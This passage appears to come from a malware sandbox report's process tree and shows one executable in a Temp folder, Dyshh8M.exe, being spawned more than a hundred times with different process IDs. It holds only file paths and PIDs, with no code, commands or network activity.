      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7156
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6484
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1724
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:796
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7176
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7184
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7192
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7200
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7208
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7216
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7224
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7232
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7240
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7248
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7264
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7280
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7288
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7296
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7304
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7312
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7320
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7328
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7336
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7344
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7352
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7360
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7376
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7384
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7392
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7400
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7408
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7416
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7424
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7432
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7440
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7448
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7456
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7464
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7472
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7480
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7504
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7520
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7528
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7560
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7568
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7576
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7620
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7628
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7636
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7644
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7652
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7660
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7668
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7676
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7684
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7716
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7724
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7740
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7748
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7760
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7768
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7780
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7788
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7796
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7804
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7812
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7820
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7828
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7836
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7844
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7852
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7860
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7868
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7876
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7884
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7892
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7900
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7908
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7916
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7924
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7932
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7940
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7948
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7956
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7980
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7988
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8000
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8016
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8028
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8052
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8060
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8068
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8076
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8084
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8092
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8100
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8120
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8128
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8136
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8144
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8152
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8160
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8168
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8176
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8184
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8196
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8248
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8256
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8264
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8280
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8288
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8296
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8304
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8312
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8320
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8328
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8364
